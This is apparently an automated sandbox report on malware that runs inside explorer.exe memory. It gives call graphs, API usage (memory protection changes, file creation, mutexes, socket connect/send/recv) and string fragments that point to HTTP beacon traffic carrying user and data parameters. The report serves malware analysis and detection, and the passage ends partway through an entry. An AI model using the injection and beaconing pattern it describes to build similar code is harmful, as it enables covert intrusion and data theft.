7078->7080 7079->7080 7080->7077 7081 7555134 7080->7081 7083 7555117 getaddrinfo 7080->7083 7081->7077 7082 7551732 connect 7081->7082 7085 75551b2 7081->7085 7082->7085 7083->7081 7084 75516b2 send 7087 7555729 7084->7087 7085->7077 7085->7084 7086 75557f4 setsockopt recv 7086->7077 7087->7077 7087->7086 7108 755383a 7109 7553841 7108->7109 7110 7554f82 6 API calls 7109->7110 7112 75538c5 7110->7112 7111 7553906 7112->7111 7113 7554232 NtCreateFile 7112->7113 7113->7111 7210 754d0fb 7212 754d137 7210->7212 7211 754d2d5 7212->7211 7213 75498f2 NtProtectVirtualMemory 7212->7213 7214 754d28a 7213->7214 7215 75498f2 NtProtectVirtualMemory 7214->7215 7218 754d2a9 7215->7218 7216 754d2cd 7217 7550382 2 API calls 7216->7217 7217->7211 7218->7216 7219 75498f2 NtProtectVirtualMemory 7218->7219 7219->7216 7220 75512e4 7221 755136f 7220->7221 7222 7551305 7220->7222 7222->7221 7223 75510c2 6 API calls 7222->7223 7223->7221 7088 754bb66 7090 754bb6a 7088->7090 7089 754bcce 7090->7089 7091 754bcb5 CreateMutexW 7090->7091 7091->7089 7224 754ece2 7226 754edd9 7224->7226 7225 754f022 7226->7225 7227 754e352 NtCreateFile 7226->7227 7228 754ef0d 7227->7228 7228->7225 7229 754e792 NtCreateFile 7228->7229 7229->7228 6884 7555bac 6885 7555bb1 6884->6885 6918 7555bb6 6885->6918 6919 754bb72 6885->6919 6887 7555c2c 6888 7555c85 6887->6888 6889 7555c54 6887->6889 6890 7555c69 6887->6890 6887->6918 6891 7553ab2 NtProtectVirtualMemory 6888->6891 6892 7553ab2 NtProtectVirtualMemory 6889->6892 6893 7555c80 6890->6893 6894 7555c6e 6890->6894 6895 7555c8d 6891->6895 6897 7555c5c 6892->6897 6893->6888 6899 7555c97 6893->6899 6898 7553ab2 NtProtectVirtualMemory 6894->6898 6955 754d102 6895->6955 6941 754cee2 6897->6941 6903 7555c76 6898->6903 6900 7555c9c 6899->6900 6901 7555cbe 6899->6901 6923 7553ab2 6900->6923 6905 7555cc7 6901->6905 6906 7555cd9 6901->6906 6901->6918 6947 754cfc2 6903->6947 6908 7553ab2 NtProtectVirtualMemory 6905->6908 6910 7553ab2 NtProtectVirtualMemory 6906->6910 6906->6918 6909 7555ccf 6908->6909 6965 754d2f2 6909->6965 6913 7555ce5 6910->6913 6983 754d712 6913->6983 6921 754bb93 6919->6921 6920 754bcce 6920->6887 6921->6920 6922 754bcb5 CreateMutexW 6921->6922 6922->6920 6925 7553adf 6923->6925 6924 7553ebc 6933 754cde2 6924->6933 6925->6924 6995 75498f2 6925->6995 6927 7553e5c 6928 75498f2 NtProtectVirtualMemory 6927->6928 6929 7553e7c 6928->6929 6930 75498f2 NtProtectVirtualMemory 6929->6930 6931 7553e9c 6930->6931 6932 75498f2 NtProtectVirtualMemory 6931->6932 6932->6924 6935 754cdf0 6933->6935 6934 754cecd 6937 7549412 6934->6937 6935->6934 7018 7550382 6935->7018 6939 7549440 6937->6939 6938 7549473 6938->6918 6939->6938 6940 754944d CreateThread 6939->6940 6940->6918 6943 754cf06 6941->6943 6942 754cfa4 6942->6918 6943->6942 6944 75498f2 NtProtectVirtualMemory 6943->6944 6945 754cf9c 6944->6945 6946 7550382 2 API calls 6945->6946 6946->6942 6948 754d016 6947->6948 6951 754d0bb 6948->6951 6952 754d0f0 6948->6952 6953 75498f2 NtProtectVirtualMemory 6948->6953 6949 754d0e8 6950 7550382 2 API calls 6949->6950 6950->6952 6951->6949 6954 75498f2 NtProtectVirtualMemory 6951->6954 6952->6918 6953->6951 6954->6949 6957 754d137 6955->6957 6956 754d2d5 6956->6918 6957->6956 6958 75498f2 NtProtectVirtualMemory 6957->6958 6959 754d28a 6958->6959 6960 75498f2 NtProtectVirtualMemory 6959->6960 6963 754d2a9 6960->6963 6961 754d2cd 6962 7550382 2 API calls 6961->6962 6962->6956 6963->6961 6964 75498f2 NtProtectVirtualMemory 6963->6964 6964->6961 6967 754d349 6965->6967 6966 754d49f 6968 75498f2 NtProtectVirtualMemory 6966->6968 6972 754d4c3 6966->6972 6967->6966 6969 75498f2 NtProtectVirtualMemory 6967->6969 6968->6972 6970 754d480 6969->6970 6971 75498f2 NtProtectVirtualMemory 6970->6971 6971->6966 6973 75498f2 NtProtectVirtualMemory 6972->6973 6974 754d597 6972->6974 6973->6974 6975 75498f2 NtProtectVirtualMemory 6974->6975 6976 754d5bf 6974->6976 6975->6976 6980 75498f2 NtProtectVirtualMemory 6976->6980 6981 754d6b9 6976->6981 6977 754d6e1 6978 7550382 2 API calls 6977->6978 6979 754d6e9 6978->6979 6979->6918 6980->6981 6981->6977 6982 75498f2 NtProtectVirtualMemory 6981->6982 6982->6977 6984 754d767 6983->6984 6985 75498f2 NtProtectVirtualMemory 6984->6985 6990 754d903 6984->6990 6986 754d8e3 6985->6986 6987 75498f2 NtProtectVirtualMemory 6986->6987 6987->6990 6988 754d9b7 6989 7550382 2 API calls 6988->6989 6993 754d9bf 6989->6993 6991 75498f2 NtProtectVirtualMemory 6990->6991 6992 754d992 6990->6992 6991->6992 6992->6988 6994 75498f2 NtProtectVirtualMemory 6992->6994 6993->6918 6994->6988 6996 7549987 6995->6996 6999 75499b2 6996->6999 7010 754a622 6996->7010 6998 7549c0c 6998->6927 6999->6998 7000 7549ba2 6999->7000 7002 7549ac5 6999->7002 7001 7555e12 NtProtectVirtualMemory 7000->7001 7009 7549b5b 7001->7009 7014 7555e12 7002->7014 7004 7555e12 NtProtectVirtualMemory 7004->6998 7005 7549ae3 7005->6998 7006 7549b3d 7005->7006 7007 7555e12 NtProtectVirtualMemory 7005->7007 7008 7555e12 NtProtectVirtualMemory 7006->7008 7007->7006 7008->7009 7009->6998 7009->7004 7012 754a67a 7010->7012 7011 754a684 7011->6999 7012->7011 7013 7555e12 NtProtectVirtualMemory 7012->7013 7013->7012 7015 7554942 7014->7015 7016 7555e45 NtProtectVirtualMemory 7015->7016 7017 7555e70 7016->7017 7017->7005 7019 75503c7 7018->7019 7024 7550232 7019->7024 7021 7550438 7028 7551632 7021->7028 7023 7550e7b 7023->6934 7025 755025e 7024->7025 7031 754f8c2 7025->7031 7027 755026b 7027->7021 7029 755166d 7028->7029 7030 755168b WSAStartup 7028->7030 7029->7030 7030->7023 7032 754f934 7031->7032 7033 754f9a6 7032->7033 7034 754f995 ObtainUserAgentString 7032->7034 7033->7027 7034->7033 7114 755162c 7115 755166d 7114->7115 7116 755168b WSAStartup 7114->7116 7115->7116 7117 754a42e 7118 754a45b 7117->7118 7126 754a4c9 7117->7126 7119 7554232 NtCreateFile 7118->7119 7118->7126 7120 754a496 7119->7120 7121 754a4c5 7120->7121 7122 754a082 NtCreateFile 7120->7122 7123 7554232 NtCreateFile 7121->7123 7121->7126 7124 754a4b6 7122->7124 7123->7126 7124->7121 7125 7549f52 NtCreateFile 7124->7125 7125->7121 7127 755172e 7128 7551788 connect 7127->7128 7129 755176a 7127->7129 7129->7128 7263 7556aa9 7264 7556aaf 7263->7264 7267 7551212 7264->7267 7266 7556ac7 7268 7551237 7267->7268 7269 755121b 7267->7269 7268->7266 7269->7268 7270 75510c2 6 API calls 7269->7270 7270->7268 7130 755022a 7131 755025e 7130->7131 7132 754f8c2 ObtainUserAgentString 7131->7132 7133 755026b 7132->7133

                                          Executed Functions

                                          Function 07554F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 7554f82-7554fb6 1 7554fd6-7554fd9 0->1 2 7554fb8-7554fbc 0->2 4 7554fdf-7554fed 1->4 5 75558fe-755590c 1->5 2->1 3 7554fbe-7554fc2 2->3 3->1 6 7554fc4-7554fc8 3->6 7 75558f6-75558f7 4->7 8 7554ff3-7554ff7 4->8 6->1 9 7554fca-7554fce 6->9 7->5 10 7554fff-7555000 8->10 11 7554ff9-7554ffd 8->11 9->1 12 7554fd0-7554fd4 9->12 13 755500a-7555010 10->13 11->10 11->13 12->1 12->4 14 7555012-7555020 13->14 15 755503a-7555060 13->15 14->15 18 7555022-7555026 14->18 16 7555062-7555066 15->16 17 7555068-755507c call 75515b2 15->17 16->17 19 75550a8-75550ab 16->19 22 7555081-75550a2 17->22 18->7 21 755502c-7555035 18->21 23 7555144-7555150 19->23 24 75550b1-75550b8 19->24 21->7 22->19 26 75558ee-75558ef 22->26 25 7555156-7555165 23->25 23->26 27 75550e2-75550f5 24->27 28 75550ba-75550dc call 7554942 24->28 30 7555167-7555178 call 7551552 25->30 31 755517f-755518f 25->31 26->7 27->26 29 75550fb-7555101 27->29 28->27 29->26 34 7555107-7555109 29->34 30->31 36 75551e5-755521b 31->36 37 7555191-75551ad call 7551732 31->37 34->26 40 755510f-7555111 34->40 38 755522d-7555231 36->38 39 755521d-755522b 36->39 47 75551b2-75551da 37->47 44 7555247-755524b 38->44 45 7555233-7555245 38->45 43 755527f-7555280 39->43 40->26 46 7555117-7555132 getaddrinfo 40->46 52 7555283-75552e0 call 7555d62 call 7552482 call 7551e72 call 7556002 43->52 49 7555261-7555265 44->49 50 755524d-755525f 44->50 45->43 46->23 51 7555134-755513c 46->51 47->36 48 75551dc-75551e1 47->48 48->36 53 7555267-755526b 49->53 54 755526d-7555279 49->54 50->43 51->23 63 75552f4-7555354 call 7555d92 52->63 64 75552e2-75552e6 52->64 53->52 53->54 54->43 69 755548c-75554b8 call 7555d62 call 7556262 63->69 70 755535a-7555396 call 7555d62 call 7556262 call 7556002 63->70 64->63 65 75552e8-75552ef call 7552042 64->65 65->63 79 75554d9-7555590 call 7556262 * 3 call 7556002 * 2 call 7552482 69->79 80 75554ba-75554d5 69->80 84 7555398-75553b7 call 7556262 call 7556002 70->84 85 75553bb-75553e9 call 7556262 * 2 70->85 109 7555595-75555b9 call 7556262 79->109 80->79 84->85 101 7555415-755541d 85->101 102 75553eb-7555410 call 7556002 call 7556262 85->102 103 7555442-7555448 101->103 104 755541f-7555425 101->104 102->101 103->109 110 755544e-7555456 103->110 107 7555467-7555487 call 7556262 104->107 108 7555427-755543d 104->108 107->109 108->109 120 75555d1-75556ad call 7556262 * 7 call 7556002 call 7555d62 call 7556002 call 7551e72 call 7552042 109->120 121 75555bb-75555cc call 7556262 call 7556002 109->121 110->109 113 755545c-755545d 110->113 113->107 132 75556af-75556b3 120->132 121->132 134 75556b5-75556fa call 7551382 call 75517b2 132->134 135 75556ff-755572d call 75516b2 132->135 153 75558e6-75558e7 134->153 144 755575d-7555761 135->144 145 755572f-7555735 135->145 150 7555767-755576b 144->150 151 755590d-7555913 144->151 145->144 149 7555737-755574c 145->149 149->144 154 755574e-7555754 149->154 157 7555771-7555773 150->157 158 75558aa-75558df call 75517b2 150->158 155 7555779-7555784 151->155 156 7555919-7555920 151->156 153->26 154->144 163 7555756 154->163 159 7555795-7555796 155->159 160 7555786-7555793 155->160 156->160 157->155 157->158 158->153 164 755579c-75557a0 159->164 160->159 160->164 163->144 167 75557b1-75557b2 164->167 168 75557a2-75557af 164->168 170 75557b8-75557c4 167->170 168->167 168->170 173 75557f4-7555861 setsockopt recv 170->173 174 75557c6-75557ef call 7555d92 call 7555d62 170->174 177 75558a3-75558a4 173->177 178 7555863 173->178 174->173 177->158 178->177 181 7555865-755586a 178->181 181->177 184 755586c-7555872 181->184 184->177 186 7555874-75558a1 184->186 186->177 186->178
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: getaddrinforecvsetsockopt
                                          • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                          • API String ID: 1564272048-1117930895
                                          • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                          • Instruction ID: 7c40743ab1130ec04606f070be4a55e4fa6a80a2bfff77a679a84f979f4ff2b2
                                          • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                          • Instruction Fuzzy Hash: 605292B0614A498FDB29EF68C4A47E9B7E2FB94300F50462FD89FC7142EE30A555CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 07554232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 309 7554232-7554256 310 75548bd-75548cd 309->310 311 755425c-7554260 309->311 311->310 312 7554266-75542a0 311->312 313 75542a2-75542a6 312->313 314 75542bf 312->314 313->314 315 75542a8-75542ac 313->315 316 75542c6 314->316 317 75542b4-75542b8 315->317 318 75542ae-75542b2 315->318 319 75542cb-75542cf 316->319 317->319 320 75542ba-75542bd 317->320 318->316 321 75542d1-75542f7 call 7554942 319->321 322 75542f9-755430b 319->322 320->319 321->322 326 7554378 321->326 322->326 327 755430d-7554332 322->327 328 755437a-75543a0 326->328 329 7554334-755433b 327->329 330 75543a1-75543a8 327->330 333 7554366-7554370 329->333 334 755433d-7554360 call 7554942 329->334 331 75543d5-75543dc 330->331 332 75543aa-75543d3 call 7554942 330->332 338 7554410-7554458 NtCreateFile call 7554172 331->338 339 75543de-755440a call 7554942 331->339 332->326 332->331 333->326 336 7554372-7554373 333->336 334->333 336->326 344 755445d-755445f 338->344 339->326 339->338 344->326 346 7554465-755446d 344->346 346->326 347 7554473-7554476 346->347 348 7554486-755448d 347->348 349 7554478-7554481 347->349 350 75544c2-75544ec 348->350 351 755448f-75544b8 call 7554942 348->351 349->328 357 75544f2-75544f5 350->357 358 75548ae-75548b8 350->358 351->326 356 75544be-75544bf 351->356 356->350 359 7554604-7554611 357->359 360 75544fb-75544fe 357->360 358->326 359->328 361 7554500-7554507 360->361 362 755455e-7554561 360->362 365 7554509-7554532 call 7554942 361->365 366 7554538-7554559 361->366 367 7554567-7554572 362->367 368 7554616-7554619 362->368 365->326 365->366 372 75545e9-75545fa 366->372 373 7554574-755459d call 7554942 367->373 374 75545a3-75545a6 367->374 370 755461f-7554626 368->370 371 75546b8-75546bb 368->371 378 7554657-755466b call 7555e92 370->378 379 7554628-7554651 call 7554942 370->379 375 75546bd-75546c4 371->375 376 7554739-755473c 371->376 372->359 373->326 373->374 374->326 381 75545ac-75545b6 374->381 382 75546f5-7554734 375->382 383 75546c6-75546ef call 7554942 375->383 385 75547c4-75547c7 376->385 386 7554742-7554749 376->386 378->326 401 7554671-75546b3 378->401 379->326 379->378 381->326 389 75545bc-75545e6 381->389 405 7554894-75548a9 382->405 383->358 383->382 385->326 390 75547cd-75547d4 385->390 393 755474b-7554774 call 7554942 386->393 394 755477a-75547bf 386->394 389->372 396 75547d6-75547f6 call 7554942 390->396 397 75547fc-7554803 390->397 393->358 393->394 394->405 396->397 403 7554805-7554825 call 7554942 397->403 404 755482b-7554835 397->404 401->328 403->404 404->358 410 7554837-755483e 404->410 405->328 410->358 414 7554840-7554886 410->414 414->405
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: `
                                          • API String ID: 823142352-2679148245
                                          • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                          • Instruction ID: ecdfeee772c816eef9e1b91e3b31c589528bfa61a183b13a4634c5b62c401476
                                          • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                          • Instruction Fuzzy Hash: 2E223DB0A18A4E9FCB59DF28C4956EAF7E1FB98301F41462FD85ED3250DB30A591CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 07555E12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 453 7555e12-7555e6e call 7554942 NtProtectVirtualMemory 456 7555e70-7555e7c 453->456 457 7555e7d-7555e8f 453->457
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL ref: 07555E67
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                          • Instruction ID: 51b09f26f12db24f6bd6799229a765946a63670d1078030afb853bd98dad1792
                                          • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                          • Instruction Fuzzy Hash: 37019E30628B884F8B88EF6CD48116AB7E4FBC9214F000B3EA99AC3250EB60C5414742
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 07555E0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 458 7555e0a-7555e38 459 7555e45-7555e6e NtProtectVirtualMemory 458->459 460 7555e40 call 7554942 458->460 461 7555e70-7555e7c 459->461 462 7555e7d-7555e8f 459->462 460->459
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL ref: 07555E67
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                          • Instruction ID: dc7828f55e2296d49c4254466e92973de6eec1233dc77603c1c6b14bb7328c1a
                                          • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                          • Instruction Fuzzy Hash: 1001A274628B884B8B48EB3C94512A6B3E5FBCE314F000B7EE99AC3240EB21D5024782
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0754F8C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • ObtainUserAgentString.URLMON ref: 0754F9A0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: AgentObtainStringUser
                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                          • API String ID: 2681117516-319646191
                                          • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                          • Instruction ID: f0b314c84b7c9005b94a78e5e10ee6e69009d2780f8c0560a5e6d6728eedf20f
                                          • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                          • Instruction Fuzzy Hash: 7A31F171610A4D8BCB54EFA8C8987EDB7E1FB98214F40022BD85ED7240EF749645C78A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0754F8BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • ObtainUserAgentString.URLMON ref: 0754F9A0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: AgentObtainStringUser
                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                          • API String ID: 2681117516-319646191
                                          • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                          • Instruction ID: 39fd1307a672d4643eb13824b7173c892222f3ba539973ba7fa1ee02e3f521a6
                                          • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                          • Instruction Fuzzy Hash: 2721F5B1610A4D8FCB14EFA8C8947EDBBE1FF98204F80021BD85AD7250EF749605C786
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0754BB66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 232 754bb66-754bb68 233 754bb93-754bbb8 232->233 234 754bb6a-754bb71 232->234 236 754bbbb-754bc22 call 7552612 call 7554942 * 2 233->236 234->236 237 754bb73-754bb92 234->237 244 754bcdc 236->244 245 754bc28-754bc2b 236->245 237->233 246 754bcde-754bcf6 244->246 245->244 247 754bc31-754bcd3 call 7556da4 call 7556022 call 75563e2 call 7556022 call 75563e2 CreateMutexW 245->247 247->244 261 754bcd5-754bcda 247->261 261->246
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: CreateMutex
                                          • String ID: .dll$el32$kern
                                          • API String ID: 1964310414-1222553051
                                          • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                          • Instruction ID: 102c343c9ad8461ee9661b9eee68cacfd98bcb441d0b8b37d0c50807b25ff52c
                                          • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                          • Instruction Fuzzy Hash: 2E417AB0918A09CFCB54EFA8C8D97E977A0FB98300F44466AC84ADB255DE309945CB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0754BB72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: CreateMutex
                                          • String ID: .dll$el32$kern
                                          • API String ID: 1964310414-1222553051
                                          • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                          • Instruction ID: f2237babc02754fb712f1606f0e6549a304498c7082eedf1eab71268a88674bd
                                          • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                          • Instruction Fuzzy Hash: 464139B0918A49CFDB94EFA8C499BED77F0FBA8300F44416AC84ADB255DE309945CB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0755172E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 289 755172e-7551768 290 7551788-75517ab connect 289->290 291 755176a-7551782 call 7554942 289->291 291->290
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: connect
                                          • String ID: conn$ect
                                          • API String ID: 1959786783-716201944
                                          • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                          • Instruction ID: 05b42c31e68f08a1832306272351ae4370f2ca83f3cf0fa701dfb42f467d6a85
                                          • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                          • Instruction Fuzzy Hash: 7D011E70618B1C8FCB94EF5CE088B55B7E0FB59314F1545AED90DCB266CA74D9818BC2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 07551732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 294 7551732-7551768 295 7551788-75517ab connect 294->295 296 755176a-7551782 call 7554942 294->296 296->295
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: connect
                                          • String ID: conn$ect
                                          • API String ID: 1959786783-716201944
                                          • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                          • Instruction ID: 4ae147e91edbd2eb418b38051e44264ca17db90c7aa96c833bc94c094a647acb
                                          • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                          • Instruction Fuzzy Hash: 78012170618A1C8FCB84EF5CE048B55B7E0FB59314F1541AE990DCB226CA74C9818BC2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0755162C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 299 755162c-755166b 300 755166d-7551685 call 7554942 299->300 301 755168b-75516a6 WSAStartup 299->301 300->301
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: Startup
                                          • String ID: WSAS$tart
                                          • API String ID: 724789610-2426239465
                                          • Opcode ID: eb8e01195b1b45a2b093131951349e4bfa8de15468bd518a6435d0ff3ce2d302
                                          • Instruction ID: 3b108032193c82c7aa5a933f96e0d571e71f79ac9aa71b587d9fa7384f51091b
                                          • Opcode Fuzzy Hash: eb8e01195b1b45a2b093131951349e4bfa8de15468bd518a6435d0ff3ce2d302
                                          • Instruction Fuzzy Hash: 9C016D70519A588FCB44DF1DD48CB69FBE0FB58351F2502AED809CF266C7B0C9468B96
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 07551632 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 304 7551632-755166b 305 755166d-7551685 call 7554942 304->305 306 755168b-75516a6 WSAStartup 304->306 305->306
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: Startup
                                          • String ID: WSAS$tart
                                          • API String ID: 724789610-2426239465
                                          • Opcode ID: 8ca80b95c4f802a72df079fcfff649d32c96cc10ab9ce8db75eb9f3d41236f43
                                          • Instruction ID: 7dba2e202c9b49deb472560358861190281774127eb0842555e32e075700b0b1
                                          • Opcode Fuzzy Hash: 8ca80b95c4f802a72df079fcfff649d32c96cc10ab9ce8db75eb9f3d41236f43
                                          • Instruction Fuzzy Hash: 03016D70518A588FCB44DF1CD08CB69FBE0FB58351F2541AAE40DCF266C7B0C9418B96
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 075516B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 417 75516b2-75516e5 418 7551705-755172d send 417->418 419 75516e7-75516ff call 7554942 417->419 419->418
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: send
                                          • String ID: send
                                          • API String ID: 2809346765-2809346765
                                          • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                          • Instruction ID: 8bc88f07e434d68787b86894dc5549730b1a89767a99357dcab075f583f38449
